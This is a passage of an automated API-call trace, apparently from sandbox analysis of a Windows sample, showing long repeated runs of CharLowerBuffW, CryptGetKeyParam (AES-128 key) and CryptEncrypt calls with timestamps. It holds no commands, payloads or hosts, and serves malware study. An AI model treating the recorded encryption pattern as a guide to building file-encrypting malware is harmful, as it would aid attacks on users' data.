| out: lpsz="byte[1]") returned 0x7 [0077.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.480] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.480] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.480] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.480] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.480] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.481] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.481] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.481] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.481] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.481] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.481] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.481] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.481] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.481] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.482] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.482] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.482] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.482] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.482] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.483] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.483] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.483] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.483] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.483] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.483] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.483] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.484] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.484] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.484] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.484] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.484] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.484] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.484] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.485] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.485] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.485] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.485] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.485] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.485] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.485] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.485] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.485] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.486] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.486] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.486] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.486] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.486] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.486] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.487] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.487] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.487] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.487] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.487] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.487] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.487] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.487] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.488] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.488] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.488] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.488] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.488] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.488] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.488] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.488] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.488] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.489] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.489] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.489] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.489] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.489] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.489] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.489] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.489] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.490] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.490] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.490] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.490] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.490] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.490] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.490] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.490] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.490] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.491] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.491] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.491] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.491] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.492] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.492] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.492] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.492] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.492] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.492] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.492] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.493] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.493] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.493] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.493] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.493] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.493] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.494] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.494] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.494] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.494] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.494] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.494] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.495] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.495] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.495] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.495] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.495] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb438*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.495] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.495] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.495] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb538, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb538*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.496] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.496] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.496] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.496] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.496] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.496] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.496] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.496] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.497] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.497] 